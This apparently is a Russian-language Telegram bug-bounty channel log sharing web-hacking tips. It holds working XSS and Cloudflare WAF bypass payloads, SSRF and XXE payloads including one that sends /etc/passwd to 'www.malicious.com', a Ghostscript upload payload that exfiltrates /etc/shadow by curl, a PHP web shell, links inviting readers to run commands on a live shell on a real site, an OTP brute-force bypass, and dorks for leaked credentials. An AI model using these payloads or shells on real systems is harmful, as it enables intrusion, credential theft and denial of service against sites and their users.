Этот канал создан потому что я только начинаю свое обучение и путь в поиске уязвимостей в веб приложениях (в сайтах проще говоря). В этом канале я буду описывать все свои действия по взлому и поиску уязвимостей, буду описывать как мыслю и как произвожу поиск, а так же буду скидывать всякие фишечки, которые будут интересны для ресечинга, как мне кажется. Так как я немного продвинулся вперед в этой теме, то возможно будет не все понятно, что я буду описывать. Для этого я подключил сюда чат, в котором это все можно обсудить и расписать более подробно, но можете писать и мне в лс. В силу своей компетенции, я буду стараться все объяснять. Надеюсь, кому-то пригодится моя деятельность.

P.S.
Так же я программирую на python, поэтому если возникают вопросы по нему, то можете задавать. если ответа я не знаю, то будем вместе разбираться и учиться)

Интересный XSS

Введите, где, к примеру, ?id=123 отражено в теле JSON внутри тега скрипта. Если вы отправите ?id=</ script>,приложение очистит ввод.

Это можно обойти с помощью ?id["</script>"]=123

Кстати это можно поискать дорками через гугл, например:
site:example.com inurl:token=

Гугл прикольно заморочились и сделали сервис, который наглядно показывает уязвимые участки кода у различных CVE
https://www.vulncode-db.com

Интересная статья. Советую к прочтению
https://m0z.co/XSS-Filter-Evasion/

Немного о пентесте андроида:
https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2

Бывают моменты когда требуется проверить xss на бекенде например в форме логина/почты или пароля. Как это сделать? Очень просто. используется принцип bling xss при котором срабатывание xss отражается на подконтрольном вам принимающем сервере. Его можно поднять самому, например тот же ngrok, можно поставить свой серв на хостинг, а можно пользоваться уже известными серверами для принятия пакетов.

Так вот при проверке xss на бекенде в формах лога и пасса порой необходимо ждать довольно долго, ибо срабатывание зависит от того, чекнет администратор лог пасс или нет. И для этого используется как раз либо чекер на своем хостинге, либо тот же requestbin.com
Удобство реквеста в том, что каждую ссылку можно подписать и вставлять в различные поля различные пейлоады. Что-то типа "><script src=http://yourbdomain.xx></script>
Или "><img src=http://yourbdomain.xx>
И зачастую xss и срабатывает. Не ленитесь проверять фильтрацию в самых неожиданных местах.

#xss #host #payloads

А вот и улов!))

Интересный кейс для поиска IDOR
https://medium.com/bugbountywriteup/account-takeover-using-idor-and-the-misleading-case-of-error-403-cb42c96ea310
Кто не шпрехает на amerikanskom - начинайте его учить. Поверьте, он очень нужен!
#IDOR #vulnerability

Ни единожды обращался к этому источнику. Думаю и вам пригодится. Там есть как рабочие пейлоады, так и ссылки на источники для разбора тех или иных уязвимостей.
https://github.com/swisskyrepo/PayloadsAllTheThings
#git

Вчера в чате спросили насчёт ssrf через подгрузку файлов на сервер.
Представим, что наш сервис позволяет подгружать файлы svg. Все просто! Если на сервере не стоит достаточная фильтрация, то код внутри свг будет исполняться. Тем самым мы можем внутрь засунуть что-то типа:
<svg width="200" height="200"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href='YOUR_DOMAIN' x='0' y='0' height='1' width='1'/>
</svg>
И если пинг на твой домен пришел, то ссрф прошло. Но на этом останавливаться не стоит, ведь там может быть rce (Remote Code Execution), и проверяется она точно так же, но в код svg вставляется либо курл на ваш домен, либо что-нибудь типа etc/passwd и так же отправляется на домен.
Нужно понимать что это blind ssrf и rce, и нудно поднимать свой домен. Об этом писал выше.
Везде где есть подгрузка файлов нужно пробовать найти ссрф. Методом подбора узнается обработчик (например imagemagick) и можно заюзать эксплоит.
Если какой то java обработчик, то можно через .js пихнуть пейлоады и выполнить XXE.
Кстати, такая слепая ssrf была недавно найдена в, казалось бы, таком монстре, как gitlab
#bypass

Так же советую прочесть эту статью:
https://brutelogic.com.br/blog/file-upload-xss/?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPost

#article

Буду периодически подкидывать интересные пейлоады на мой взгляд с небольшим объяснением.

XSS Auditor Bypass

В отражении URL, где полезная нагрузка может быть включена в его путь

<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>

https://brutelogic.com.br/xss.php/%22%3E%3Clink%20rel=import%20href=%27.%26%2347%22%3E%3Csvg%2520onload=alert(domain)%3E%27

Самый простой из байпасов - HTMLi, выходящий из блока скрипта (хотя он и должен находиться там, где синтаксис JS не затронут).

</script><svg><script>alert(1)%0A-->

https://brutelogic.com.br/xss.php?c1=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%0A--%3E

Обратите внимание, что исходный код помечается красным (знак Аудитора), но все равно выполняется.
#xss #payloads #bypass

IDOR-ом займусь завтра. Сегодня буду разбираться с нейросетью. Свой код могу тоже выкладывать, если это будет кому-то интересно. Пишу на python-е, поэтому по программированию на нем тоже можете задавать вопросы. Буду стараться на них отвечать.

Пейлоад, который bo0om подкинул еще в 16 году:
https://jsfiddle.net/xxbzcv15/
#xss #payloads

Интересная статья по работе с burp-ом с реальным примером:
https://resources.infosecinstitute.com/burpsuite-tutorial/

#article #tutorial

Мне поступило предложение делать хештеги для удобного поиска и я его заюзал. Список хештегов будет постоянно обновляться и висеть в закрепе.

Думаю, что теги интуитивно понятны и пояснять их не нужно)
#xss
#host
#payloads
#IDOR
#ssrf
#vulnerability
#git
#bypass
#article
#cloudflare
#spark_png

Очередная фишка, о которой бы хотелось рассказать стара как мир, но тем не менее она недавно была выялвена на одном из сайтов управления репозиториями, чей домен назвать пока не могу. Суть данной фишки заключается в следующем: DOS одной картинкой.
Как это возможно? Изи! Есть легендарная картинка, под названием spark.png
Наверняка о ней вы уже слышали и кто-то даже сталкивался с ней. Уникальность данной картинки заключается в том, что сам по себе файл картинки весит всего пару мегабайт, но при конвертации его в реальную картинку, она разворачивается примерно в 50 гигапикселей и занимает около 140 гб. Таким образом при подгрузке этого изображения например в качестве своей аватарки на каком либо сервисе, на котором нет фильтрации по lenght и wight, можно сломать обработку изобраений на серверах сайта. Именно так и получилось с уязвимым сервисом для репозиториев. Их сервера лежали около двух дней. Благо притензий потом не было)
Эту картинку можно найти простым гуглением в первой ссылке на сайте xakep и заодно более подробно узнать об истории данного явления. Так же вы можете сами накидать скрипток который создаст картинку побольше или поменьше под себя (у меня был где-то скрипт.. если найду - кину сюда).
Картинку приложу архивом сюда.

Не забывайте о 272 статье УК РФ и ищите баги только в приложениях у которых есть программа багбаунти или с владельцами которых есть договоренность. Иначе есть возможность присесть на стеклянную..)
#spark_png #vulnerability

#ssrf #vulnerability #tutorial

Одним из способов проверить наличие ssrf на сайте является проверка на атаку межсайтового порта. Что она из себя представляет:
Например есть приложение, которое предоставляет пользователю возможность вводить ссылку на внешнее изображение со стороннего сервера. Большинство сайтов социальных сетей имеют эту функцию, которая позволяет пользователям обновлять изображение своего профиля, либо загружая изображение, либо предоставляя URL-адрес изображения, размещенного в другом месте в Интернете. Вставляя ссылку на изображение, мы получаем либо превью, либо само изображение на сайте. Но если там есть ssrf, то мы можем вставить ссылку с портом ssh и тем самым увидим версию ssh. Если версия вывелась как показано на скрине, значит ssrf имеет место быть.

Так же мы можем проверить предпросмотр ссылок на наличие ssrf. Если мы дадим в поле ввода сайт example.com:80, то получим обыкновенное превью сайта. Если же мы зададим какой-нибудь порт типа 4950 или 31337, то превью выведено не будет, так как эти порты закрытые. Эти примеры показывают, что мы можем попробовать SSRF, просто вставив номер порта в URL, т.е.
http://example.com:80/ => Дает вывод (Порт 80 открыт)
http://example.com:31337/ => Нет выходных данных (порт 31337 закрыт)
nmap.org:22 => выводит информацию о баннере (скажем, SSH-2.0-OpenSSH_5.3pl Debia-3ubuntu7)

#xss #payloads #bypass

Очередной bypass DotDefender WAF
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

#xss #payloads #bypass #cloudflare

R.I.P.
пофиксили фишку с байпасом cloudflare((

but it also bypasses the cloudflare:
'"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'>
😁

#vulnerability #clickjacking

Провел опрос о уязвимости под названием clickjacking, который показал, что большинство голосующих не знают что это за уязвимость, а из тех, кто ни разу ее не находил, скорее всего некоторые просто не умеют этого делать. Поэтому я решил "пояснить" за clickjacking так, как ее вижу я и объяснить как же ее можно искать.
Эта уязвимость часто упоминается как одна из самых игнорируемых веб-уязвимостей, относится к типу атаки, которая обманывает пользователей, заставляя их неосторожно щелкать по вредоносным ссылкам, созданным злоумышленником. При нажатии на эти ссылки злоумышленник может собирать конфиденциальную информацию, нарушать конфиденциальность пользователя или заставлять пользователя выполнять действия. Игнорируют данную дыру из-за того, что довольно редко удается найти критический impact ее применения. Если мы перейдем на https://t.co/9U04a5e2qB, то увидим, что отчетов по этой уязвимости 118 (на момент написания этого обзора), в тот момент как та же xss имеет 1536 отчетов. И выплаты либо отсутствуют вообще или очень малы, либо очень велики так как удалось найти что-то оочень серьезное.
Почему эту форму атаки намного труднее предотвратить, чем найти? Потому что этот тип атаки применяет широко используемую функциональность - фреймы. В то время как фреймы широко используются для страниц входа в систему, Javascript-взаимодействий, управления контентом в CMS, он также был тщательно использован для выполнения атаки с восстановлением пользовательского интерфейса (UI redress attack/clickjacking).
learn.javascript.ru объясняет эту уязвимость так:
Вот как выглядел бы «угон клика» пользователя, который зарегистрирован на Facebook, если Facebook был бы уязвим к нему:

• На вредоносной странице пользователю подсовывается безобидная ссылка (скажем, что-то скачать, «разбогатеть сейчас», посмотреть ролик или просто перейти по ссылке на интересный ресурс).
• Поверх этой заманчивой ссылки помещен прозрачный iframe со страницей facebook.com, так что кнопка «Like» находится чётко над ней.
• Кликая на ссылку, посетитель на самом деле нажимает на эту кнопку.
Пример: https://learn.javascript.ru/article/clickjacking/clickjacking-visible/
Здесь iframe полупрозрачный и мы его видим. Но в реальности, конечно, никто не будет делать его видимым.
Обнаружить уязвимую страничку легко. Нужно чтобы на странице не было заголовка X-Frame-Options
Еще можно встретить сайты с защитой на стороне javasctipt

if (top != window) {
top.location = window.location;
}

Но она на данный момент легко обходится.

Максимально простое объяснение всему этому: я на своем сайте делаю фрейм, который поверх какой-то кнопки, которую точно нажмут. Ну или во весь экран вообще. Потом эту ссылку подбрасываю пользователю, авторизованному в paypal на данный момент. Он жмет по ссылке, уходит запрос в серваки paypal и исполняется от его имени. Клик, как думает пользователь, происходит по одной кнопке, а на самом деле клик по кнопке сайта из фрейма.
Если что-то осталось непонятно (как это было до последнего непонятно мне), то жми кнопочку "обсудить" и не стесняйся задавать вопросы в чат.

UPD:
При эксплуатации уязвимости, burp вам в помощь:
https://support.portswigger.net/customer/en/portal/articles/2363105-using-burp-to-find-clickjacking-vulnerabilities

#xss
#host
#payloads
#IDOR
#ssrf
#vulnerability
#git
#bypass
#article
#cloudflare
#spark_png
#clickjacking

#dork

Небольшой совет на ночь:
1- проверь эти дорки в github, ты можешь найти что-то интересное
"Company name" language:python
"Company name" language:bash
2. Следи за js-файлами на предмет изменений, чтобы найти новые конечные точки.
3- брутфорс и поиск других hiddin js файлов, которые называются в приложении.

#dork

При запуске программы, в которой вы проводите ресерчинг уязвимостей, используйте этот дорк:
site:target.com inurl:lang=
или же
inurl:locale=
Вы можете получить инъекцию CRLF, если она отражается.

#xss

Небольшой совет который может показаться очевидным, но наверняка много кто пропускает это мимо:
Если вы решили поиграться с url и у вас появляется 404, а на странице ошибки отображается тот url (как на скрине), который вы подставляли, то не поленитесь и попробуйте вставить пейлоад xss, к примеру. Чаще всего на эти страницы недостаточно фильтруют входящие символы и можно получить reflected xss)
И не останавливайтесь на обычных пейлоадах. Проводите полноценную проверку и пробуйте всевозможные байпасы.

#termux

Для любителей хакинга через андроид и termux:
https://hackersploit.org/t/termux-hacks-guide-2019-and-beyond/427

#tutorial #IDOR

Небольшой туториал по тому, как очень просто можно получить баунти, к примеру, за плохую конфигурацию (вк принимает данные отчеты) или за IDOR.
Открыв объект исследования мы видим основной домен и скоуп. Весь скоуп вместе с основным доменом нужно прогнать через sublist3r или dnsdumpster (ссылки будут ниже) на наличие поддоменов. После чего все эти поддомены необходимо прогнать через dirsearch или opendoor и собрать все домены которые отвечают 200.
Если есть что-то стоящее типа example.com/.git/ то можно попробовать проверить сурцы на наличие других дыр. Остальное стоит рассматривать индивидуально.

Ссылки:
Sublist3r — https://github.com/aboul3la/Sublist3r
dnsdumpster — https://dnsdumpster.com/
opendoor — https://github.com/stanislav-web/OpenDoor
dirsearch — https://github.com/maurosoria/dirsearch

Выглядеть это должно примерно так: тут мы видим, что на одном из поддоменов gitlab есть открытые домены типа forgot_password.php и тому подобные. Эти домены не несут опасности и представлены для наглядности. Но ранее на этом же поддомене была и IDOR.

Перенёс хэштеги в описание канала для удобства

#tips

Небольшой совет по багбаунти:
Проверяйте всегда функционал сайта, требующий оплаты или ручной настройки. Как правило, другие багхантеры этого не делают и высока вероятность того, что там останется уязвимость. Таким образом я находил не единожды blind xss, которая исполнялась у админов сайта.

#git

Огромный список всяких тулзов:
https://github.com/toniblyx/my-arsenal-of-aws-security-tools

С утра залез на hackerone и увидел, что мне прилетела приватка. Подумал, что старая, но все равно принял и обнаружил, что она появилась 20 июня и еще никто не получил ни одного Resolved по ней. А значит, что там должно быть много уязвимостей)
Залез на основной домен, который был единственный представлен в scope, и он оказался конечной точкой сети EOS.
Первым же делом полез смотреть различные дирректории вручную. Найдя example.com/graphql, решил пропустить через dirsearch и обнаружил еще и graphiql. Попробовал стандартный запрос в graphql:
{__schema{types{name}}}
На выходе получил неплохой ответ (на скрине). После чего попробовал прочесть таблицы и это удалось. Зарепортил на h1 как GraphQL injection. Жду ответа и продолжаю поиск.

Немного об отношении к багхантерам...

#git #tips

Открыл для себя утилиту TheHarvester
Утилита отлично сканит поддомены и выдает намного больше чем тот же Sublist3r. Рекомендую ее.
git: https://github.com/laramies/theHarvester
Пример запроса:
python3 theHarvester.py -d example.com -l 100 -b all

#cloudflare #bypass #payloads #xss

Еще один WAF CloudFlare bypass который работает на уголковые скобки и выглядит вот так:
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
Может работать и без iframe. Пока не фикс.

Если вдруг кто ещё не знает про кнопку "discuss" или "обсудить", то нажав на нее вы попадете в наш чатик, где порой обсуждаются проблемы человечества и их решение)

Набросал статью о том, что из себя представляет багбаунти, как я в него пришел и почему ctf jeopardy - это могильный камень в жизни пентестера:
https://vk.com/@-168686655-bagbaunti-bud-muzhikom-ischi-bagi

#news

Это приведет лишь к популяризации p2p видеохостингов. Как подметили в комментариях на habr:
"Пошел заливать видео «как пользоваться sqlmap» на pornhub"
https://habr.com/ru/news/t/458806/
https://youtu.be/LIdZ2oPyB1Y

#payloads #ssrf #tips #vulnerability

Шпаргалка по ssrf. Надеюсь, вы знаете корейский)

https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-domain-cname-arecord.html?m=1

https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1

Рекомендую к просмотру данное видео. Да и канал в целом. Возможно кто-то ещё о нем не знает. А с новой политикой youtube, многи вскоре и вовсе не узнают о нем..

https://youtu.be/l8iXMgk2nnY

#dork

За xss поясню малость позже. Руки не доходят. А пока вот вам some github search keywords. Думаю, пояснять как пользоваться не обязательно.

Assuming target(.)com

*"target(.)com" password
*"target(.)com" "pass" 'email'
*"target(.)com" "api"
*"target(.)com" FTP
*"target(.)com" SMTP
*"target(.)com" LDAP
*"target(.)com" PEM (For Keys)

If found nothing try to change it.

#xss #article

Решил залить как отдельную статью, чтоб можно было адекватно прикрепить скрины. Задавайте вопросы, если они останутся:

https://telegra.ph/Ocherednaya-statya-pro-xss-07-09

#xss #payloads #bypass #cloudflare

Очередной обход Cloudflare:

Просто используйте {alert1} вместо alert(1).

Любой вектор #XSS будет работать (кроме <script>).

P.S.
Странно телеграм тригерит на обратные кавычки. Выше алерт должен быть как на скрине:

Незадолго до того, как я хотел написать статью про race condition, она вышла у bo0om. Считаю ее достаточно хорошей, поэтому сам описывать не буду. Если останутся вопросы после прочтения, то добро пожаловать в чат или ко мне в лс.

Немного про burp suite.
Как использовать его в веб-приложениях. Для новичков самое то!

https://jonathansblog.co.uk/burpsuite-beginners-tutorial

https://www.pentestgeek.com/web-applications/burp-suite-tutorial-1

https://www.pentestgeek.com/web-applications/how-to-use-burp-suite

https://medium.com/cyberdefenders/burp-suite-webpage-enumeration-and-vulnerability-testing-cfd0b140570d

https://support.portswigger.net/customer/portal/articles/2326039-the-burp-methodology-

https://vimeo.com/showcase/3510171

В дополнение к статьям выше про бурп:
http://www.primalsecurity.net/tutorials/exploit-tutorials/

В частности оочень советую прочесть это:
http://www.primalsecurity.net/0x2-exploit-tutorial-web-hacking-with-burp-suite/

Нашел race condition в instagram. Позволяет как минимум заспамить пользователям почту и телефон в любом объеме. Отписал им репорт. Есть шанс, что такое не примут, то по идее должны, ведь это они почту и телефон убивают то)
Так и бомбер написать можно только за счет инсты. В общем, жду ответа от поддержки Facebook. В зависимости от ответа, расскажу о том как нашел и как пришел к уязвимости либо сразу, либо после закрытия.
Всем сладких снов))

#tutorial

Отличный доклад Мишани Фирстова киберпанкича (@cyberpunkych) на positive hack days, который освещает основные уязвимости и подводные камни в них. Советую глянуть. Доклад на русском)

https://broadcast.comdi.com/watch/rjlb5hbj

Предлагайте в лс (@areafishing) уязвимость, которую описать следующей. Разберу наиболее популярную.

#dork

RCE в Jira(CVE-2019–11581)
Дорк к вашим услугам:

inurl:/ContactAdministrators!default.jspa

Все действия под свою ответственность.

#vulnerability #xxe

Рассказываю за XXE. Какие-либо открытия я вряд-ли сделаю, но расскажу как это выглядит.
В XXE ничего сложного нет. Классическая XXE это когда мы в сущность (переменую) записываем содержимое файла и после где то выводим.

К примеру:

<?xml version="1.0"?>
  <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

В сущность xxe записываем содержимое /etc/passwd
И между <foo>&xxe;</foo> выводим это содержимое

Через XXE можно попробовать получить доступ к какому нибудь локальному ресурсу (SSRF) и иногда можна получить RCE, например через враппер expect.
Есть еще слепые XXE. Весь смысл слепых xxe в том, чтобы записать что то в сущность и после сделать запрос на снифер you_domain.com/site?peremennaya=%xxe; к примеру.

Или вот так:

?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>

Еще можно ддосить, но это такое.
К примеру так:

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

Рассказ получился небольшим, но более менее емким в связи с тем, что у меня катастрофически не хватает времени. Но это не на долго! Скоро будут новые посты)

Если что-то непонятно - добро пожаловать в чат (справа внизу кнопка discuss/обсудить) или ко мне в лс (@areafishing).

#tutorial

Годная статья по osint-у. Посвящается @TheLegend911

https://osintcurio.us/2019/07/16/searching-instagram/

#XSS #payloads #vulnerability

обработчики ontouch * для мобильного XSS

<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>

#CORS #vulerability

Итак, CORS Misconfiguration.
Cors расшифровывается как  Cross-Origin Resource Sharing. Суть этой уязвимости состоит в том, что вредоносный сайт может получить все содержимое другого сайта если его сервер отдает заголовок и отражает домен с которого идет запрос.

Access-Control-Allow-Origin: домен_с_которого_идет_запрос.com
Access-Control-Allow-Credentials: true - это заголовок разрешает отправлять куки

Почему так происходит?
Есть Same-origin policy (политика одинакового источника). Это нужно чтобы один сайт не мог получить доступ к данным к другого сайта. Т.е. ты авторизировался на фейсбуке и во второй вкладке открыл "плохой сайт" который делает скрытый запрос к фейсбуку, например в сообщения и получает всю твою переписку.
И из-за этого сделалили политику одинакового источника. Сайт может сделать запрос и прочесть данные только если совпадает протокол, порт и хост, за исключениям браузера ИЕ. Он не смотрит на порт и вроде как доверяет поддоменам)

Чтобы обойти это ограничение, используют CORS(Cross-Origin Resource Sharing)

Сервер должен отдать заголовок Access-Control-Allow-Origin: https://домен.ком - это домен сайта который может получать ответ от запроса
Если выставить * то все смогут получать ответ

Но запросы будут отправлятся без кук и они как правило не опасные

Чтобы запросы отправлялись с куками нужно еще добавить заголовок Access-Control-Allow-Credentials: true

И на всякий случай напишу.

Если увидите заголовки со звездочкой Access-Control-Allow-Origin: * с Access-Control-Allow-Credentials: true то ответ не получится получить, так как браузерам игнорируют * с Access-Control-Allow-Credentials: true (защита на уровне браузера).

Как правило в сайтах которые уязвимые к CORS Misconfigurations домен отражается в Access-Control-Allow-Origin: https://домен.com из нашего заголовка Origin:

Вот пример как сделать запрос и получить ответ в уязвимом сайте

<script>
  fetch('https://уязвимый сайт', {credentials: 'include'})
    .then((response) => response.text())
    .then((data) => document.write(data));
</script>

Еще иногда можно обойти CSRF защиту, если она вместо токенов использует методы типа PUT и есть заголовок Access-Control-Allow-Origin: PUT где указаные методы через кому которые без разрешения мы не можем отправить на сервер.

Если что-то непонятно, то добро пожаловать в чат (@api_00) или в лс (@areafishing).

#article

https://medium.com/@saadahmedx/bypassing-cors-13e46987a45b

В одноклассниках найдена (товарищем) rce через подгрузку. После фикса расскажу что да как. Но выглядит красиво!)

#article

Пакости в instagram. Данная фишка так же актуальна во многих сервисах, таких как gitlab, trustpilot, github и тд и тп и в тч.

https://telegra.ph/Igry-s-instoj-08-05

#xss {#Cloudfare } #bypass by @spyerror (twitter):


</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>

Прочел в твиттере что IP-адреса можно сократить, отбросив нули. Примеры: http://1.0.0.1 → http: //1.1 http://192.168.0.1 → http: //192.168.1 Это обходит фильтры WAF для SSRF, открытого перенаправления и т. д., где любой IP-адрес в качестве входных данных попадает в черный список.

P.S.
Немного покопавшись в интернете нашел статью, объясняющую происхождение и причины данного явления.

https://stuff-things.net/2014/09/25/magic-ip-address-shortcuts/

Кому-то да пригодится:

https://mailchi.mp/3f46ceb46357/improve-your-reconnaissance-performance-by-using-gnu-parallel

https://www.gnu.org/software/parallel/

Something interesting is planned!))

Быстрый экскурс по работе некоторых тулз:

https://instagram.com/648hrk?igshid=1eb3qt7g5o97j

Дисклоуз после закрытия отчета))
Подобная дыра была в отчете по ссылке ниже, но тогда за пандао платили мало (Фырк должен знать😁):
https://hackerone.com/reports/484160

#git #tips

Хороший клондайк нашел. Занимайтес:

https://github.com/trimstray/the-book-of-secret-knowledge

"С уважением,

Сунгуров Александр

Отдел информационной безопасности

ООО НКО <Яндекс.Деньги>

Тел. +7 (812) 334-77-50 доб. 38466

<mailto:sungurov@yamoney.ru> sungurov@yamoney.ru"


Помните я говорил про то, что если есть багбаунти, то можете смело искать уязвимости? Так вот нихрена. Гнилая контора Яндекс открывает багбаунти программу и кидает абузу на сканеры, при этом не указав в публичной оферте то, что сканами пользоваться нельзя (если им так они не нравятся). Это самый гнилой поступок, который я вообще видел в сфере ИТ. Просто ниже Яндекс в моих глазах еще не отпускался. Я уверен, что им еще есть куда стремиться и они опустятся еще ниже.

Короче, нас 200 единомышленников уже! Если на бутылку с товарищем не уйдем, то буду продолжать вести канал в том же духе. Надеюсь, вам все нравится))

#article #rce #bypass

Давно ничего не выкладывал. Все как-то на море да на рыбалке. Ну, на то это и отпуск.
Что-то там насчет рце вас интересовало, да? Рце были найдены в одноклассниках и в одном из доменов майл груп.
Разделю этот мини отчет на несколько пунктов:
*Где была найдена уязвимость в:
`одноклассниках
`мыле
*Как искать подобные уязвимости
*Где взять файлы для аплоада


Где в одноклассниках была найдена данная рце? Дело в том, что в одноклассниках была форма приема скринов или фото паспортов. Но в одноклассниках тоже не дураки сидят, поэтому пхп туда просто так не зальешь. Там стояла внешняя проверка на формат, которая успешно обходилась сменойй контент тайпа, после чего появилась возможность подгрузить вот такой шелл: <?php echo shell_exec($_GET['e'].' 2>&1'); ?> и выйти на него по ссылке site.com/shell.php?e=command (вместо command ставим команду типа ls).
Где в мыле была найдена дыра? Она была в поддомене source.33slona.ru и там была действительно защита, которую успешно байпаснули через расширение phpinfo.jpeg.php (старые версии именно так можно байпасить) после чего можно было увидеть пхпинфо по ссылке http://source.33slona.ru/editor/video/gallery/phpinfo.jpg.php. Но, благо уже фикс)

Подобные уязвимости ищутся очень просто обычным проксированием запросов и прочтением ответов. Вы заливаете нужный вам шелл в место, куда подгружаются файлы. Например загрузка паспорта как в одноклассниках. и перехватываете запрос с отправкой вашего файла на сервер. Удостоверяетесь в том, что файл действительно был отправлен и ждете респонс (ответ на amerikansk0m) от сервера на этот реквест (запрос на amerikansk0m). Зачастую сервер в ответе отдает ссылку на этот файл (порой ее нужно собрать как пазл). Перейдя по этой ссылке вы можете исполнить команду как в примере с одноклассниками или же увидеть пхпинфо как в примере с тридцатью тремя слонами мыла (зачем им столько слонов..) Есть еще один способ проверить на rce. А именно залить файл, типа jpg с вот таким содержимым:

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (var=cat /etc/shadow | base64 && curl YOUR_DOMAIN.LOL/?ssr=$var) currentdevice putdeviceprops

где твой домен точка лол - это твой домен, на который придет пинг. Я для таких целей использую либо requestbin.com, либо поднимаю ngrok.

Где взять файлы для аплоада? Если вы вниматочно меня читали, то выше я давал полезную ссылочку на PayloadAllTheThings, где есть раздел Upload Insecure Files. Даю ссылочку снова: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
Пожалуйста, пользуйте и аплоадьте где хотите. КРОМЕ ЯНДЕКСА. Они сумасшедшие))

Заходите в чат если что-то непонятно. Там не кусаются. в чат можно попасть нажав кнопку обсудить (discus на amerikansk0m) справа внизу экрана вашего телефона или по ссылке @api_00. Можете писать и в лс. постараюсь ответить на все по максимуму. @areafishing

Играйтесь (272 ук рф):

http://mailsensey.ru/editor/video/gallery/iframe0x01.jpg.php?e=ls

http://mailsensey.ru/editor/video/gallery/iframe0x01.jpg.php?e=ls%20../../../../../../

С трёх ночи не могли разобраться че с этим делать. В итоге сошлись на том, что ссрф))

В одноклассниках, а вернее в их "мессенджере" tamtam только что буквально найдена возможность скачивать любое голосовое сообщение из любой переписки. Дисклоуз по закрытию.
Пример в прикреплении.

вот еще парочку

Накидайте, пожалуйста, идей в лс (@areafishing) или чат (@api_00) какой функционал намутить для чат бота используя нейросеть)

#tips

Ежедневно пользуюсь данным сайтишкой. Очень мне помогает. Что-то даже и не додумался его слить сюда, пока подписчик не подсказал.
https://suip.biz
Очень часто пользую сёрчер поддоменов. Довольно годный: https://suip.biz/ru/?act=amass
Разбирайте)

Фикс.

Cloudflare #XSS #Bypass again xD

<svg/onload=%26nbsp;alert`loool`+

от товарища рагнара

В одном сервисе вход по статичному четырехциферному коду, что приходит по смс. Рейс кондишн не прошла и линейная отправка не прошла, так как там ограниченное количество вводов кода. Но, по-моему, я байпаснул эту тему и если подтвердится, то позже расскажу как это удалось!)

Не прошло и полгода, как инсту опять нагнули.. Но мне кажется 10к$ маловато для такого:

https://thezerohack.com/hack-instagram-again#articlescroll

#article #bypass

Поясняю за байпас, о котором вчера говорилось выше:
Вот этот вебсокет отправляется при проверке кода:

{"ver":10,"cmd":0,"seq":4,"opcode":18,"payload":{"authTokenType":"PHONE","token":"Ahl6a_4WW9E3ECmfYQH2hnOYZ_D4Hs5z-EUupHx9qZ9so71SNtKV91LOzyLEo1S3vKuqqUUxT-CrngayKgGmTxw","verifyCode":"0000"}}

Как вы можете заметить, тут имеется токен, который обновляется при повторном запросе кода на номер телефона. И код на номер телефона отправлялся каждый раз один и тот же (в 2к19 статичный код, Карл!) до определенного момента. Момент этот наступает тогда, когда мне приходит ответ таким сокетом:

{"ver":10,"cmd":3,"seq":4,"opcode":18,"payload":{"error":"code.limit","message":"Key: errors.userActivity.restricted, args: [1,1,0,].","localizedMessage":"Превышено число попыток, попробуйте позже"}}

После чего код на сервере сбрасывается и на номер телефона приходит новый код, что не есть хорошо (для нас), потому что весь брут на смарку. Не давало нужного результата отправка многопоточно кодов, так же ничего не дало разделение отправки по времени и разделение по времени этапов многопоточности. После блокировки за превышение числа попыток, я пытался отправить код повторно с другого IP, но ничего не удавалось.
Но поболтав с товарищем, подумывали уже искать закономерности в генерации кодов, но вовремя заметили что в сообщении, которое мы отправляем с кодом есть токен, по которому скорее всего и высчитывалось количество попыток ввода, ибо по чему еще если не по нему (мейби по номеру телефона, но зачем тогда этот токен). И тут пришла идея попытки байпаса этой проверки на количество.

Так как этот токен обновляется при повторной отправке кода на номер телефона, было решено отправлять код партиями и после чего останавливаться, для «обнуления» токена через отправку нового кода на телефон и после чего возвращаться к бруту с новым токеном.
Все шло хорошо, но после двух попыток отправки кода я очень разочаровался, потому что в третий раз пришел новый код без но уже не от domain.ru, а от voobshe_drugoi_domain.ru
Я был расстроен до тех пор, пока не увидел, что ответа о том, что превышено число попыток так и не поступило. Попробовав снова отправить код на номер телефона я получил исходный код от domain.ru и удачно окончил брут, получив валидную сессию, после отправки верного кода!

{"ver":10,"cmd":1,"seq":38,"opcode":18,"payload":{"tokenTypes":{"AUTH":"auth_token"},"profile":{"options":["TT"],"updateTime":1566******333,"id":5819******47,"names":[{"name":"Austine Augie","type":"TT"}]}}}

Скрипт для отправки вебсокетов будет ниже.

Решайте челенж
После окнчания объясню решение)
https://twitter.com/intigriti/status/1166309484328837121

Если кто решает, то дыра под хром заточена (ну и ещё 6 подсказок в комментариях к челенжу в твиттере 😁)

У одмена др! Он пошел спать. Объяснение челенжа будет завтрича)

